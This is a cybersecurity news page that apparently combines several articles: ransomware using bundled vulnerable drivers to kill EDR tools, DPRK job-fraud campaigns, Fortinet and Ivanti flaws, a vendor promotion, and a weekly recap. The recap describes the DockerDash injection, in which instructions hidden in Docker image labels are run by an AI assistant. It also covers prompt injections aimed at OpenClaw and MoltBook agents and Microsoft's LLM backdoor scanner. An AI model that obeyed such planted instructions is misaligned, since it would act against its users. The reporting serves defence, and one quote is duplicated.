Category: Cybersecurity

Cybersecurity researchers have disclosed details of an emergent ransomware family dubbed Reynolds that comes embedded with a built-in bring your own vulnerable driver (BYOVD) component for defense evasion purposes within the ransomware payload itself.

BYOVD refers to an adversarial technique that abuses legitimate but flawed driver software to escalate privileges and disable Endpoint Detection and Response (EDR) solutions so that malicious activities go unnoticed. The strategy has been adopted by many ransomware groups over the years.

“Normally, the BYOVD defense evasion component of an attack would involve a distinct tool that would be deployed on the system prior to the ransomware payload in order to disable security software,” the Symantec and Carbon Black Threat Hunter Team said in a report shared with The Hacker News. “However, in this attack, the vulnerable driver (an NsecSoft NSecKrnl driver) was bundled with the ransomware itself.”

Broadcom’s cybersecurity teams noted that this tactic of bundling a defense evasion component within the ransomware payload is not novel, and that it has been observed in a Ryuk ransomware attack in 2020 and in an incident involving a lesser-known ransomware family called Obscura in late August 2025.

In the Reynolds campaign, the ransomware is designed to drop a vulnerable NsecSoft NSecKrnl driver and terminate processes associated with various security programs from Avast, CrowdStrike Falcon, Palo Alto Networks Cortex XDR, Sophos (along with HitmanPro.Alert), and Symantec Endpoint Protection, among others.

It’s worth noting that the NSecKrnl driver is susceptible to a known security flaw (CVE-2025-68947, CVSS score: 5.7) that could be exploited to terminate arbitrary processes. Notably, the driver has been put to use by a threat actor known as Silver Fox in attacks designed to kill endpoint security tools prior to delivering ValleyRAT. 

Over the past year, the hacking group has previously wielded multiple legitimate but flawed drivers – including truesight.sys and amsdk.sys – as part of BYOVD attacks to disarm security programs.

By bringing together defense evasion and ransomware capabilities into one component, it makes it harder for defenders to stop the attack, not to mention obviating the need for an affiliate to separately incorporate this step into their modus operandi.

“Also of note in this attack campaign was the presence of a suspicious side-loaded loader on the target’s network several weeks prior to the ransomware being deployed,” Symantec and Carbon Black said. “Also of note in this attack campaign was the presence of a suspicious side-loaded loader on the target’s network several weeks prior to the ransomware being deployed.”

Another tool deployed on the target network a day after the ransomware deployment was the GotoHTTP remote access program, indicating that the attackers may be looking to maintain persistent access to the compromised hosts.

“BYOVD is popular with attackers due to its effectiveness and reliance on legitimate, signed files, which are less likely to raise red flags,” the company said.

“The advantages of wrapping the defense evasion capability in with the ransomware payload, and the reason ransomware actors might do this, may include the fact that packaging the defense evasion binary and the ransomware payload together is “quieter”, with no separate external file dropped on the victim network.”

The finding coincides with various ransomware-related developments in recent weeks –

• A high-volume phishing campaign has used emails with Windows shortcut (LNK) attachments to run PowerShell code that fetches a Phorpiex dropper, which is then used to deliver the GLOBAL GROUP ransomware. The ransomware is notable for carrying out all activity locally on the compromised system, making it compatible with air‑gapped environments. It also conducts no data exfiltration.
• Attacks mounted by WantToCry have abused virtual machines (VMs) provisioned by ISPsystem, a legitimate virtual infrastructure management provider, to host and deliver malicious payloads at scale. Some of the hostnames have been identified in the infrastructure of multiple ransomware operators, including LockBit, Qilin, Conti, BlackCat, and Ursnif, as well as various malware campaigns involving NetSupport RAT, PureRAT, Lampion, Lumma Stealer, and RedLine Stealer.
• It’s assessed that bulletproof hosting providers are leasing ISPsystem virtual machines to other criminal actors for use in ransomware operations and malware delivery by exploiting a design weakness in VMmanager’s default Windows templates that reuse the same static hostname and system identifiers every time they are deployed. This, in turn, allows threat actors to set up thousands of VMs with the same hostname and complicate takedown efforts.
• DragonForce has created a “Company Data Audit” service to support affiliates during extortion campaigns as part of the continued professionalization of ransomware operations. “The audit includes a detailed risk report, prepared communication materials, such as call scripts and executive-level letters, and strategic guidance designed to influence negotiations,” LevelBlue said. DragonForce operates as a cartel that allows affiliates to create their own brands while operating under its umbrella and gaining access to its resources and services.
• The latest iteration of LockBit, LockBit 5.0, has been found to use ChaCha20 to encrypt files and data across Windows, Linux, and ESXi environments, a shift from the AES-based encryption approach in LockBit 2.0 and LockBit 3.0. In addition, the new version features a wiper component, an option to delay execution prior to encryption, track status of encryption using a progress bar, improved anti-analysis techniques to evade detection, and enhanced in-memory execution to minimize disk traces.
• The Interlock ransomware group has continued its assault on U.K.- and U.S.-based organizations, particularly in the education sector, in one case leveraging a zero-day vulnerability in the “GameDriverx64.sys” gaming anti-cheat driver (CVE-2025-61155, CVSS score: 5.5) to disable security tools in a BYOVD attack. The attack is also characterized by the deployment of NodeSnake/Interlock RAT (aka CORNFLAKE) to steal sensitive data, while initial access is said to have originated from a MintLoader infection.
• Ransomware operators have been observed increasingly shifting their focus from traditional on-premises targets to cloud storage services, especially misconfigured S3 buckets used by Amazon Web Services (AWS), with the attacks leaning on native cloud features to delete or overwrite data, suspend access, or extract sensitive content, while simultaneously staying under the radar.

According to data from Cyble, GLOBAL GROUP is one of the many ransomware crews that sprang forth in 2025, the others being Devman, DireWolf, NOVA, J group, Warlock, BEAST, Sinobi, NightSpire, and The Gentlemen. In Q4 2025 alone, Sinobi’s data leak site listings increased 306%, making it the third-most active ransomware group after Qilin and Akira, per ReliaQuest.

“Meanwhile, the return of LockBit 5.0 was one of Q4’s biggest shifts, driven by a late-quarter spike that saw the group list 110 organizations in December alone,” researcher Gautham Ashok said. “This output signals a group that can scale execution quickly, convert intrusions into impact, and sustain an affiliate pipeline capable of operating at volume.”

The emergence of new players, combined with partnerships forged between existing groups, has led to a spike in ransomware activity. Ransomware actors claimed a total of 4,737 attacks during 2025, up from 4,701 in 2024. The number of attacks that don’t involve encryption and instead rely purely on data theft as a means to exert pressure reached 6,182 during the same period, a 23% increase from 2024.

As for the average ransom payment, the figure stood at $591,988 in Q4 2025, a 57% jump from Q3 2025, driven by a small number of “outsized settlements,” Coveware said in its quarterly report last week, adding threat actors may return to their “data encryption roots” for more effective leverage to extract ransoms from victims.

The information technology (IT) workers associated with the Democratic People’s Republic of Korea (DPRK) are now applying to remote positions using real LinkedIn accounts of individuals they’re impersonating, marking a new escalation of the fraudulent scheme.

“These profiles often have verified workplace emails and identity badges, which DPRK operatives hope will make their fraudulent applications appear legitimate,” Security Alliance (SEAL) said in a series of posts on X.

The IT worker threat is a long-running operation mounted by North Korea in which operatives from the country pose as remote workers to secure jobs in Western companies and elsewhere under stolen or fabricated identities. The threat is also tracked by the broader cybersecurity community as Jasper Sleet, PurpleDelta, and Wagemole.

The end goal of these efforts is two-pronged: to generate a steady revenue stream to fund the nation’s weapons programs, conduct espionage by stealing sensitive data, and, in some cases, take it further by demanding ransoms to avoid leaking the information.

Last month, cybersecurity company Silent Push described the DPRK remote worker program as a “high-volume revenue engine” for the regime, enabling the threat actors to also gain administrative access to sensitive codebases and establish living-off-the-land persistence within corporate infrastructure.

“Once their salaries are paid, DPRK IT workers transfer cryptocurrency through a variety of different money laundering techniques,” blockchain analysis firm Chainalysis noted in a report published in October 2025.

“One of the ways in which IT workers, as well as their money laundering counterparts, break the link between source and destination of funds on-chain, is through chain-hopping and/or token swapping. They leverage smart contracts such as decentralized exchanges and bridge protocols to complicate the tracing of funds.”

To counter the threat, individuals who suspect their identities are being misappropriated in fraudulent job applications are advised to consider posting a warning on their social media accounts, along with listing their official communication channels and the verification method to contact them (e.g., company email). 

“Always validate that accounts listed by candidates are controlled by the email they provide,” Security Alliance said. “Simple checks like asking them to connect with you on LinkedIn will verify their ownership and control of the account.”

“The businesses have been tricked into hiring what likely North Korean IT workers in home office positions,” PST said last week. “The salary income North Korean employees receive through such positions probably goes to finance the country’s weapons and nuclear weapons program.”

Running parallel to the IT worker scheme is another social engineering campaign dubbed Contagious Interview that involves using fake hiring flows to lure prospective targets into interviews after approaching them on LinkedIn with job offers. The malicious phase of the attack kicks in when individuals presenting themselves as recruiters and hiring managers instruct targets to complete a skill assessment that eventually leads to them executing malicious code.

In one case of a recruiting impersonation campaign targeting tech workers using a hiring process resembling that of digital asset infrastructure company Fireblocks, the threat actors are said to have asked candidates to clone a GitHub repository and run commands to install an npm package to trigger malware execution.

“The campaign also employed EtherHiding, a novel technique that leverages blockchain smart contracts to host and retrieve command-and-control infrastructure, making the malicious payload more resilient to takedowns,” security researcher Ori Hershko said. “These steps triggered the execution of malicious code hidden within the project. Running the setup process resulted in malware being downloaded and executed on the victim’s system, giving the attackers a foothold in the victim’s machine.”

In recent months, new variants of the Contagious Interview campaign have been observed using malicious Microsoft VS Code task files to execute JavaScript malware disguised as web fonts that ultimately lead to the deployment of BeaverTail and InvisibleFerret, allowing persistent access and theft of cryptocurrency wallets and browser credentials, per reports from Abstract Security and OpenSourceMalware.

Koalemos RAT campaign

Another variant of the intrusion set documented by Panther is suspected to involve the use of malicious npm packages to deploy a modular JavaScript remote access trojan (RAT) framework dubbed Koalemos via a loader. The RAT is designed to enter a beacon loop to retrieve tasks from an external server, execute them, send encrypted responses, and sleep for a random time interval before repeating again.

It supports 12 different commands to conduct filesystem operations, transfer files, run discovery instructions (e.g., whoami), and execute arbitrary code. The names of some of the packages associated with the activity are as follows –

• env-workflow-test
• sra-test-test
• sra-testing-test
• vg-medallia-digital
• vg-ccc-client
• vg-dev-env

“The initial loader performs DNS-based execution gating and engagement date validation before downloading and spawning the RAT module as a detached process,” security researcher Alessandra Rizzo said. “Koalemos performs system fingerprinting, establishes encrypted command-and-control communications, and provides full remote access capabilities.”

Labyrinth Chollima Segments into Specialized Operational Units

The development comes as CrowdStrike revealed that the prolific North Korean hacking crew known as Labyrinth Chollima has evolved into three separate clusters with distinct objectives and tradecraft: the core Labyrinth Chollima group, Golden Chollima (aka AppleJeus, Citrine Sleet, and UNC4736), and Pressure Chollima (aka Jade Sleet, TraderTraitor, and UNC4899).

It’s worth noting that Labyrinth Chollima, along with Andariel and BlueNoroff, are considered to be sub-clusters within the Lazarus Group (aka Diamond Sleet and Hidden Cobra), with BlueNoroff splintering into TraderTraitor and CryptoCore (aka Sapphire Sleet), according to an assessment from DTEX.

Despite the newfound independence, these adversaries continue to share tools and infrastructure, suggesting centralized coordination and resource allocation within the DPRK cyber apparatus. Golden Chollima focuses on consistent, smaller-scale cryptocurrency thefts in economically developed regions, whereas Pressure Chollima pursues high-value heists with advanced implants to single out organizations with significant digital asset holdings.

New North Korea Clusters

On the other hand, Labyrinth Chollima’s operations are motivated by cyber espionage, using tools like the FudModule rootkit to achieve stealth. The latter is also attributed to Operation Dream Job, another job-centred social engineering campaign designed to deliver malware for intelligence gathering.

“Shared infrastructure elements and tool cross-pollination indicate these units maintain close coordination,” CrowdStrike said. “All three adversaries employ remarkably similar tradecraft – including supply chain compromises, HR-themed social engineering campaigns, trojanized legitimate software, and malicious Node.js and Python packages.”

Ravie LakshmananFeb 10, 2026Vulnerability / Network Security

Fortinet has released security updates to address a critical flaw impacting FortiClientEMS that could lead to the execution of arbitrary code on susceptible systems.

The vulnerability, tracked as CVE-2026-21643, has a CVSS rating of 9.1 out of a maximum of 10.0.

“An improper neutralization of special elements used in an SQL Command (‘SQL Injection’) vulnerability [CWE-89] in FortiClientEMS may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP requests,” Fortinet said in an advisory.

The shortcoming affects the following versions –

• FortiClientEMS 7.2 (Not affected)
• FortiClientEMS 7.4.4 (Upgrade to 7.4.5 or above)
• FortiClientEMS 8.0 (Not affected)

Gwendal Guégniaud of the Fortinet Product Security team has been credited with discovering and reporting the flaw.

While Fortinet makes no mention of the vulnerability being exploited in the wild, it’s essential that users move quickly to apply the fixes.

The development comes as the company addressed another critical severity flaw in FortiOS, FortiManager, FortiAnalyzer, FortiProxy, FortiWeb (CVE-2026-24858, CVSS score: 9.4) that allows an attacker with a FortiCloud account and a registered device to log into other devices registered to other accounts, if FortiCloud SSO authentication is enabled on those devices.

Fortinet has since acknowledged that the issue has been actively exploited by bad actors to create local admin accounts for persistence, make configuration changes granting VPN access to those accounts, and exfiltrate the firewall configurations.

Ravie LakshmananFeb 10, 2026Data Breach / Vulnerability

The Netherlands’ Dutch Data Protection Authority (AP) and the Council for the Judiciary confirmed both agencies (Rvdr) have disclosed that their systems were impacted by cyber attacks that exploited the recently disclosed security flaws in Ivanti Endpoint Manager Mobile (EPMM), according to a notice sent to the country’s parliament on Friday.

“On January 29, the National Cyber Security Center (NCSC) was informed by the supplier of vulnerabilities in EPMM,” the Dutch authorities said. “EPMM is used to manage mobile devices, apps, and content, including their security.”

“It is now known that work-related data of AP employees, such as names, business email addresses, and telephone numbers, have been accessed by unauthorized persons.”

The development comes as the European Commission also revealed that its central infrastructure managing mobile devices “identified traces” of a cyber attack that may have resulted in access to names and mobile numbers of some of its staff members. The Commission said the incident was contained within nine hours, and that no compromise of mobile devices was detected.

“The Commission takes seriously the security and resilience of its internal systems and data and will continue to monitor the situation,” it added. “It will take all necessary measures to ensure the security of its systems.”

Although the name of the vendor was specified and no details were shared on how the attackers managed to gain access, it’s suspected to be linked to malicious activity exploiting flaws in Ivanti EPMM.

Finland’s state information and communications technology provider, Valtori, also disclosed a breach that exposed work-related details of up to 50,000 government employees. The incident, identified on January 30, 2026, targeted a zero-day vulnerability in the mobile device management service.

The agency said it installed the corrective patch on January 29, 2026, the same day Ivanti released fixes for CVE-2026-1281 and CVE-2026-1340 (CVSS scores: 9.8), which could be exploited by an attacker to achieve unauthenticated remote code execution.

Ivanti has acknowledged that the vulnerabilities have been exploited as zero-days, and that a “very limited number of customers” were exploited, but it has not provided an updated victim count.

The attacker is said to have gained access to information used in operating the service, including names, work email addresses, phone numbers, and device details.

“Investigations have shown that the management system did not permanently delete removed data but only marked it as deleted,” it said “As a result, device and user data belonging to all organizations that have used the service during its lifecycle may have been compromised. In certain cases, a single mobile device may have multiple users.”

watchTowr CEO Benjamin Harris told The Hacker News in an emailed statement that the attacks are not acts of random opportunism, but rather the work of a “highly skilled, well-resourced actor executing a precision campaign.”

“Attackers are targeting your most trusted, deeply embedded enterprise systems. Anything assumed to be ‘internal’ or ‘safe’ should now be viewed with suspicion,” Harris said.

“Resilience is as important as prevention, especially when attackers move fast and operate with surgical precision. What differentiates minor headaches from full-blown crises is speed: how quickly teams identify anomalies, validate weaknesses, and contain the damage.”

Why do SOC teams keep burning out and missing SLAs even after spending big on security tools? Routine triage piles up, senior specialists get dragged into basic validation, and MTTR climbs, while stealthy threats still find room to slip through. Top CISOs have realized the solution isn’t hiring more people or stacking yet another tool onto the workflow, but giving their teams faster, clearer behavior evidence from the start.

Here’s how they’re breaking the cycle and speeding up response without extra hiring.

Starting with Sandbox-First Investigation to Cut MTTR at the Source

The fastest way to reduce MTTR is to remove the delays baked into investigations. Static verdicts and fragmented workflows force analysts to guess, escalate, and re-check the same alerts, which drives burnout and slows containment.

That’s why top CISOs are making sandbox execution the first step.

With an interactive sandbox like ANY.RUN, teams can detonate suspicious files and links in an isolated environment and see real behavior immediately, so decisions happen early, not after hours of back-and-forth.

Check the real case of a phishing attack exposed in 33 seconds

Full phishing attack chain analyzed inside an interactive sandbox in real time, revealing a fake Microsoft login page

Why CISOs prioritize sandbox-first workflows:

• MTTR drops because clarity comes in minutes: Runtime evidence replaces assumptions, so qualification and containment start faster.
• Fewer escalations, less senior time wasted: Tier-1 validates alerts with behavior proof, driving up to a 30% reduction in Tier-1 → Tier-2 escalations and keeping specialists focused on real incidents.
• Lower burnout through fewer manual steps: Less “chasing context,” fewer repeats, more predictable workloads.

Automating Triage to Increase SOC Output and Protect SLAs

After early clarity comes scale. Even with strong visibility, SOCs slow down if every alert still demands manual effort. By automating triage, CISOs unlock measurable gains across response speed, workload balance, and SOC efficiency:

• Faster investigations, faster containment: Automated execution shortens the gap between alert and decision, directly reducing MTTR.
• Fewer errors under pressure: Consistent handling of routine steps lowers risk during high-volume periods.
• More impact from the same team: Junior staff resolve more alerts independently, reducing escalation load on senior specialists.
• Better use of senior expertise: Experts spend time on real incidents, not revalidating basic alerts.
• Higher SOC efficiency overall: Less fatigue, fewer handoffs, and steadier SLA performance.

In real phishing and malware campaigns, attackers often hide malicious behavior behind QR codes, redirect chains, or CAPTCHA gates. Manually replaying these steps costs time and attention, exactly what SOC teams don’t have.

Phishing attack with QR code exposed with the help of automation and interactivity, saving time and resources

With automated sandbox execution, those steps are handled instantly. Hidden URLs are opened, gating is passed, and malicious behavior is exposed within seconds, without waiting, retries, or workarounds.

Malicious URL revealed inside ANY.RUN sandbox

Analysts can still step in live at any moment, inspect processes, or trigger additional actions, but they’re no longer burdened by repetitive setup work.

Giving the team this dual approach, automation plus interactivity, means the following for CISOs: faster response, lower workload, and more SOC capacity, without adding headcount. Automation not only speeds up investigations but also stabilizes the team behind them.

Reducing Burnout by Removing Decision Fatigue

Burnout in the SOC isn’t caused by a lack of commitment. It’s caused by constant high-stakes decisions made with incomplete information. When teams spend their shifts deciding whether alerts are “probably fine” or “worth escalating,” stress compounds quickly.

Sandbox-first and automated triage workflows change that dynamic.

Instead of guessing, teams work from observable behavior. They get structured outputs they can act on immediately: behavior timelines, extracted IOCs, mapped TTPs, and clear, shareable reports that make handoffs fast and decisions defensible. When time is tight, built-in AI assistance helps summarize what matters, so analysts spend less energy interpreting noise and more time closing cases.

ANY.RUN’s auto-generated reports for fast and efficient sharing

For CISOs, the impact shows up in several ways:

• More predictable workloads: Investigations follow consistent paths instead of expanding unpredictably.
• Lower fatigue across shifts: Less manual replay, fewer tool switches, and fewer stalled cases.
• Stronger team retention: Teams stay engaged when work leads to confident outcomes, not constant uncertainty.

When decision fatigue drops, MTTR follows. The SOC becomes calmer, more focused, and easier to run, not because threats are simpler, but because the workflow is.

What CISOs Are Reporting After Moving to Evidence-Based Response

After shifting to sandbox-first investigation, automated triage, and built-in collaboration, CISOs are using ANY.RUN report consistent improvements in how sustainably their SOCs operate.

Across teams, leaders are seeing:

• Up to 3× increase in SOC output: More alerts handled with the same team, driven by faster qualification and fewer repeat steps.
• MTTR reduced by up to 50%: Early execution evidence shortens investigations and accelerates containment.
• Up to 30% fewer Tier-1 → Tier-2 escalations: Clear behavior proof enables junior staff to resolve cases confidently.
• Higher detection rates for evasive threats: 90% of organizations report higher detection rates, particularly for stealthy and evasive threats.
• Lower burnout and steadier SLA performance: Predictable workflows replace constant firefighting, easing pressure across shifts.

These numbers reflect real operational gains: faster response without extra hiring, better use of senior expertise, and a SOC that scales without exhausting the people running it.

Build a Faster, More Sustainable SOC Without Extra Hiring

The best SOCs don’t wait. They respond fast, protect their teams from burnout, and stay steady even when alert volume spikes. But that only happens when the investigation workflow is built for speed and sustainability.

By making sandbox execution the first step, automating repetitive triage, and keeping investigation context shared and controlled, top CISOs are cutting MTTR without adding headcount.

ANY.RUN brings that foundation together in one place. It gives your team the visibility, automation, and enterprise-grade control needed to reduce delays, lower escalation pressure, and keep operations stable.

Trusted by CISOs to deliver:

• Faster MTTR through early behavior evidence
• Lower risk of business disruption and costly incidents
• Fewer unnecessary escalations and cleaner handoffs
• Less burnout and better team retention
• Stronger ROI from existing security investments

Ready to see what this looks like in your environment?

Request ANY.RUN access to build a faster, more sustainable SOC on evidence, control, and repeatable workflows, without adding headcount.

Ravie LakshmananFeb 09, 2026Hacking News / Cybersecurity

Cyber threats are no longer coming from just malware or exploits. They’re showing up inside the tools, platforms, and ecosystems organizations use every day. As companies connect AI, cloud apps, developer tools, and communication systems, attackers are following those same paths.

A clear pattern this week: attackers are abusing trust. Trusted updates, trusted marketplaces, trusted apps, even trusted AI workflows. Instead of breaking security controls head-on, they’re slipping into places that already have access.

This recap brings together those signals — showing how modern attacks are blending technology abuse, ecosystem manipulation, and large-scale targeting into a single, expanding threat surface.

⚡ Threat of the Week

OpenClaw announces VirusTotal Partnership — OpenClaw has announced a partnership with Google’s VirusTotal malware scanning platform to scan skills that are being uploaded to ClawHub as part of a defense-in-depth approach to improve the security of the agentic ecosystem. The development comes as the cybersecurity community has raised concerns that autonomous artificial intelligence (AI) tools’ persistent memory, broad permissions, and user‑controlled configuration could amplify existing risks, leading to prompt injections, data exfiltration, and exposure to unvetted components. This has also been complemented by the discovery of malicious skills on ClawHub, a public skills registry to augment the capabilities of AI agents, once again demonstrating that marketplaces are a gold mine for criminals who populate the store with malware to prey on developers. To make matters worse, Trend Micro disclosed that it observed malicious actors on the Exploit.in forum actively discussing the deployment of OpenClaw skills to support activities such as botnet operations. Another report from Veracode revealed that the number of packages on npm and PyPI with the name “claw” has increased exponentially from nearly zero at the start of the year to over 1,000 as of early February 2026, providing new avenues for threat actors to smuggle malicious typosquats. “Unsupervised deployment, broad permissions, and high autonomy can turn theoretical risks into tangible threats, not just for individual users but also across entire organizations,” Trend Micro said. “Open-source agentic tools like OpenClaw require a higher baseline of user security competence than managed platforms.” 

• German Agencies Warn of Signal Phishing — Germany’s Federal Office for the Protection of the Constitution (aka Bundesamt für Verfassungsschutz or BfV) and Federal Office for Information Security (BSI) have issued a joint advisory warning of a malicious cyber campaign undertaken by a likely state-sponsored threat actor that involves carrying out phishing attacks over the Signal messaging app. The attacks have been mainly directed at high-ranking targets in politics, the military, and diplomacy, as well as investigative journalists in Germany and Europe. The attack chains exploit legitimate PIN and device linking features in Signal to take control of victims’ accounts.
• AISURU Botnet Behind 31.4 Tbps DDoS Attack — The botnet known as AISURU/Kimwolf has been attributed to a record-setting distributed denial-of-service (DDoS) attack that peaked at 31.4 Terabits per second (Tbps) and lasted only 35 seconds. The attack took place in November 2025, according to Cloudflare, which automatically detected and mitigated the activity. AISURU/Kimwolf has also been linked to another DDoS campaign codenamed The Night Before Christmas that commenced on December 19, 2025. In all, DDoS attacks surged by 121% in 2025, reaching an average of 5,376 attacks automatically mitigated every hour.
• Notepad++ Hosting Infrastructure Breached to Distribute Chrysalis Backdoor — Between June and October 2025, threat actors quietly and very selectively redirected traffic from Notepad++’s updater program, WinGUp, to an attacker-controlled server that downloaded malicious executables. While the attacker lost their foothold on the third-party hosting provider’s server on September 2, 2025, following scheduled maintenance where the server firmware and kernel were updated. However, the attackers still had valid credentials in their possession, which they used to continue routing Notepad++ update traffic to their malicious servers until at least December 2, 2025. The adversary specifically targeted the Notepad++ domain by taking advantage of its insufficient update verification controls that existed in older versions of Notepad++. The findings show that updates cannot be treated as trusted just because they come from a legitimate domain, as the blind spot can be abused as a vector for malware distribution. The sophisticated supply chain attack has been attributed to a threat actor known as Lotus Blossom. “Attackers prize distribution points that touch a large population,” a Forrester analysis said. “Update servers, download portals, package managers, and hosting platforms become efficient delivery systems, because one compromise creates thousands of downstream victims.”
• DockerDash Flaw in Docker AI Assistant Leads to RCE — A critical-severity bug in Docker’s Ask Gordon AI assistant can be exploited to compromise Docker environments. Called DockerDash, the vulnerability exists in the Model Context Protocol (MCP) Gateway’s contextual trust, where malicious instructions embedded into a Docker image’s metadata labels are forwarded to the MCP and executed without validation. This is made possible because the MCP Gateway does not distinguish between informational metadata and runnable internal instructions. Furthermore, the AI assistant trusts all image metadata as safe contextual information and interprets commands in metadata as legitimate tasks. Noma Security named the technique meta-context injection. It was addressed by Docker with the release of version 4.50.0 in November 2025.
• Microsoft Develops Scanner to Detect Hidden Backdoors in LLMs — Microsoft has developed a scanner designed to detect backdoors in open-weight AI models in hopes of addressing a critical blind spot for enterprises that are dependent on third-party large language models (LLMs). The company said it identified three observable indicators that suggest the presence of backdoors in language models: a shift in how a model pays attention to a prompt when a hidden trigger is present, almost independently from the rest of the prompt; models tend to leak their own poisoned data, and partial versions of the backdoor can still trigger the intended response. “The scanner we developed first extracts memorized content from the model and then analyzes it to isolate salient substrings,” Microsoft noted. “Finally, it formalizes the three signatures above as loss functions, scoring suspicious substrings and returning a ranked list of trigger candidates.”

‎️‍🔥 Trending CVEs

New vulnerabilities surface daily, and attackers move fast. Reviewing and patching early keeps your systems resilient.

Here are this week’s most critical flaws to check first — CVE-2026-25049 (n8n), CVE-2026-0709 (Hikvision Wireless Access Point), CVE-2026-23795 (Apache Syncope), CVE-2026-1591, CVE-2026-1592 (Foxit PDF Editor Cloud), CVE-2025-67987 (Quiz and Survey Master plugin), CVE-2026-24512 (ingress-nginx), CVE-2026-1207, CVE-2026-1287, CVE-2026-1312 (Django), CVE-2026-1861, CVE-2026-1862 (Google Chrome), CVE-2026-20098 (Cisco Meeting Management), CVE-2026-20119 (Cisco TelePresence CE Software and RoomOS), CVE-2026-0630, CVE-2026-0631, CVE-2026-22221, CVE-2026-22222, CVE-2026-22223, CVE-2026-22224, CVE-2026-22225, CVE-2026-22226, 22227, CVE-2026-22229 (TP-Link Archer BE230), CVE-2026-22548 (F5 BIG-IP), CVE-2026-1642 (F5 NGINX OSS and NGINX Plus), and CVE-2025-6978 (Arista NG Firewall).

📰 Around the Cyber World

• OpenClaw is Riddled With Security Concerns — The skyrocketing popularity of OpenClaw (née Clawdbot and Moltbot) has attracted cybersecurity worries. With artificial intelligence (AI) agents having entrenched access to sensitive data, giving “bring-your-own-AI” systems privileged access to applications and the user conversations carries significant security risks. The architectural concentration of power means AI agents are designed to store secrets and execute actions – features that are all essential to meet their objectives. But when they are misconfigured, the very design that serves as their backbone can collapse multiple security boundaries at once. Pillar Security has warned that attackers are actively scanning exposed OpenClaw gateways on port 18789. “The traffic included prompt injection attempts targeting the AI layer — but the more sophisticated attackers skipped the AI entirely,” researchers Ariel Fogel and Eilon Cohen said. “They connected directly to the gateway’s WebSocket API and attempted authentication bypasses, protocol downgrades to pre-patch versions, and raw command execution.” Attack surface management firm Censys said it identified 21,639 exposed OpenClaw instances as of January 31, 2026. “Clawdbot represents the future of personal AI, but its security posture relies on an outdated model of endpoint trust,” said Hudson Rock. “Without encryption-at-rest or containerization, the ‘Local-First’ AI revolution risks becoming a goldmine for the global cybercrime economy.”
• Prompt Injection Risks in MoltBook — A new analysis of MoltBook posts has revealed several critical risks, including “506 prompt injection attacks targeting AI readers, sophisticated social engineering tactics exploiting agent psychology,” anti-human manifestos receiving hundreds of thousands of upvotes, and unregulated cryptocurrency activity comprising 19.3% of all content,” according to Simula Research Laboratory. British programmer Simon Willison, who coined the term prompt injection in 2022, has described Moltbook as the “most interesting place on the internet right now.” Vibe, coded by its creator, Matt Schlicht, Moltbook marks the first time AI agents built atop the OpenClaw platform can communicate with each other, post, comment, upvote, and create sub-communities without human intervention. While Moltbook is pitched as a way to offload tedious tasks, equally apparent are the security pitfalls, given the deep access the AI agents have to personal information. Prompt injection attacks hidden in natural language text can instruct an AI agent to reveal private data.
• Malicious npm Packages Use EtherHiding Technique — Cybersecurity researchers have discovered a set of 54 malicious npm packages targeting Windows systems that use an Ethereum smart contract as a dead drop resolver to fetch a command-and-control (C2) server to receive next-stage payloads. This technique, codename EtherHiding, is notable because it makes takedown efforts more difficult, allowing the operators to modify the infrastructure without making any changes to the malware itself.”The malware includes environment checks designed to evade sandbox detection, specifically targeting Windows systems with 5 or more CPUs,” Veracode said. Other capabilities of the malware include system profiling, registry persistence via a COM hijacking technique, and a loader to execute the second-stage payload delivered by the C2. The C2 server is currently inactive, making it unclear what the exact motives are.
• Ukraine Rolls Out Verification for Starlink — Ukraine has rolled out a verification system for Starlink satellite internet terminals used by civilians and the military after confirming that Russian forces have begun installing the technology on attack drones. The Ukrainian government has introduced a mandatory allowlist for Starlink terminals, as part of which only verified and registered devices will be allowed to operate in the country. All other terminals will be automatically disconnected.
• Cellebrite Tech Used Against Jordanian Civil Society — The Jordanian government used Cellebrite digital forensic software to extract data from phones belonging to at least seven Jordanian activists and human rights defenders between late 2023 and mid-2025, according to a new report published by the Citizen Lab. The extractions occurred while the activists were being interrogated or detained by authorities. Some of the recent victims were activists who organized protests in support of Palestinians in Gaza. Citizen Lab said it uncovered iOS and Android indicators of compromise tied to Cellebrite in all four phones it forensically analyzed. It’s suspected that authorities have been using Cellebrite since at least 2020.
• ShadowHS, a Fileless Linux Post‑Exploitation Framework — Threat hunters have discovered a stealthy Linux framework that runs entirely in memory for covert, post-exploitation control. The activity has been codenamed ShadowHS by Cyble. “Unlike conventional Linux malware that emphasizes automated propagation or immediate monetization, this activity prioritizes stealth, operator safety, and long‑term interactive control over compromised systems,” the company said. “The loader decrypts and executes its payload exclusively in memory, leaving no persistent binary artifacts on disk. Once active, the payload exposes an interactive post‑exploitation environment that aggressively fingerprints host security controls, enumerates defensive tooling, and evaluates prior compromise before enabling higher‑risk actions.” The framework supports various dormant modules that support credential access, lateral movement, privilege escalation, cryptomining, memory inspection, and data exfiltration.
• Incognito Operator Gets 30 Years in Prison — Rui-Siang Lin, 24, was sentenced to 30 years in U.S. prison for his role as an administrator of Incognito Market, which facilitated millions of dollars’ worth of drug sales. Lin ran Incognito Market from January 2022 to March 2024 under the moniker “Pharaoh,” enabling the sale of more than $105 million of narcotics. Incognito Market allowed about 1,800 vendors to sell to a customer base exceeding 400,000 accounts. In all, the operation facilitated about 640,000 narcotics transactions. Lin was arrested in May 2024, and he pleaded guilty to the charges later that December. “While Lin made millions, his offenses had devastating consequences,” said U.S. Attorney Jay Clayton. “He is responsible for at least one tragic death, and he exacerbated the opioid crisis and caused misery for more than 470,000 narcotics users and their families.”
• INC Ransomware Group’s Slip-Up Proves Costly — Cybersecurity firm Cyber Centaurs said it has helped a dozen victims recover their data after breaking into the backup server of the INC Ransomware group, where the stolen data was dumped. The INC group started operations in 2023 and has listed more than 100 victims on its dark web leak site. “While INC Ransomware demonstrated careful planning, hands-on execution, and effective use of legitimate tools (LOTL), they also left behind infrastructure and artifacts that reflected reuse, assumption, and oversight,” the company said. “In this instance, those remnants, particularly related to Restic, created an opening that would not normally exist in a typical ransomware response.”
• Xinbi Marketplace Accounts for $17.9B in Total Volume — A new analysis from TRM Labs has revealed that the illicit Telegram-based guarantee marketplace known as Xinbi has continued to remain active, while those of its competitors, Haowang (aka HuiOne) Guarantee and Tudou Guarantee, dropped by 100% and 74%, respectively. Wallets associated with Xinbi have received approximately $8.9 billion and processed roughly $17.9 billion in total transaction volume. “Guarantee services attract illicit actors by offering informal escrow, wallet services, and marketplaces with minimal due diligence, making them a critical laundering facilitator layer,” the blockchain intelligence firm said.
